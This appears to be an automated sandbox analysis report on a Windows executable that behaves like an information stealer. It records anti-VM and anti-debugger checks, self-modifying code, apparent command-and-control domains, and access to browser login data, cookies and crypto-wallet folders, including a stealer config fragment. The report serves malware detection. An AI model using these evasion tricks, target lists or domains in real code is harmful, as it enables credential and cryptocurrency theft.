                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F00 second address: 5760F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F18 second address: 5760F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F31 second address: 5760F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F36 second address: 5760F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F3B second address: 5760F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246F7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e jmp 00007F6644F246F6h 0x00000013 je 00007F66B53C80FAh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F7D second address: 5760F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760F83 second address: 5760FB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6644F246EAh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760FB0 second address: 5760FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760FB4 second address: 5760FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 577094C second address: 57709CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F664452DAE2h 0x00000011 push eax 0x00000012 jmp 00007F664452DADBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F664452DAE6h 0x0000001d mov ebp, esp 0x0000001f jmp 00007F664452DAE0h 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov cl, 14h 0x00000028 jmp 00007F664452DAE3h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F664452DAE4h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 57709CE second address: 57709D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 57709D4 second address: 5770A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F664452DADEh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F664452DAE7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770A12 second address: 5770A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770A1A second address: 5770A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d jmp 00007F664452DAE6h 0x00000012 popad 0x00000013 je 00007F66B49CB44Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F664452DADDh 0x00000022 jmp 00007F664452DADBh 0x00000027 popfd 0x00000028 mov bl, ch 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770A64 second address: 5770AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75C7459Ch], 05h 0x00000010 pushad 0x00000011 call 00007F6644F246EEh 0x00000016 mov bx, si 0x00000019 pop ecx 0x0000001a pushad 0x0000001b mov esi, edi 0x0000001d mov edi, 205D98ACh 0x00000022 popad 0x00000023 popad 0x00000024 je 00007F66B53DA0DFh 0x0000002a pushad 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop esi 0x0000002e push ebx 0x0000002f pop esi 0x00000030 popad 0x00000031 mov edx, 1134ECBAh 0x00000036 popad 0x00000037 push ebp 0x00000038 pushad 0x00000039 popad 0x0000003a mov dword ptr [esp], esi 0x0000003d pushad 0x0000003e mov edx, ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F6644F246ECh 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770ADE second address: 5770AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770AE2 second address: 5770B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6644F246F2h 0x0000000c sub ecx, 4096C788h 0x00000012 jmp 00007F6644F246EBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007F6644F246F6h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F6644F246ECh 0x00000028 pop eax 0x00000029 movsx edi, si 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770BE2 second address: 5770BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770BFD second address: 5770C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5770C02 second address: 5770C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F664452DAE5h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, 3553F96Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Special instruction interceptor: First address: EB7C42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Special instruction interceptor: First address: 10698E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Special instruction interceptor: First address: 1093E3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Special instruction interceptor: First address: 107058E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Special instruction interceptor: First address: 10F1E55 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7324 | Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7344 | Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7432 | Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7616 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084934951.0000000001046000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
                Source: gJkNLYV0ax.exe, gJkNLYV0ax.exe, 00000000.00000002.2085682261.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084563810.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085484486.00000000019A8000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084934951.0000000001046000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: SICE
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: rapeflowwj.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crosshuaht.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sustainskelet.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: aspecteirs.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: energyaffai.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacebudi.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: discokeyus.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: grannyejh.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sweepyribs.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084934951.0000000001046000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: gJkNLYV0ax.exe, 00000000.00000003.2026127813.0000000001A68000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027537679.0000000001A68000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2025752485.0000000006081000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: gJkNLYV0ax.exe PID: 7308, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: gJkNLYV0ax.exe | String found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: gJkNLYV0ax.exe | String found in binary or memory: Wallets/ElectronCash
                Source: gJkNLYV0ax.exe | String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: gJkNLYV0ax.exe | String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: gJkNLYV0ax.exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: gJkNLYV0ax.exe | String found in binary or memory: Wallets/Exodus
                Source: gJkNLYV0ax.exe | String found in binary or memory: Wallets/Ethereum
                Source: gJkNLYV0ax.exe | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: gJkNLYV0ax.exe, 00000000.00000003.2027466840.0000000001A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
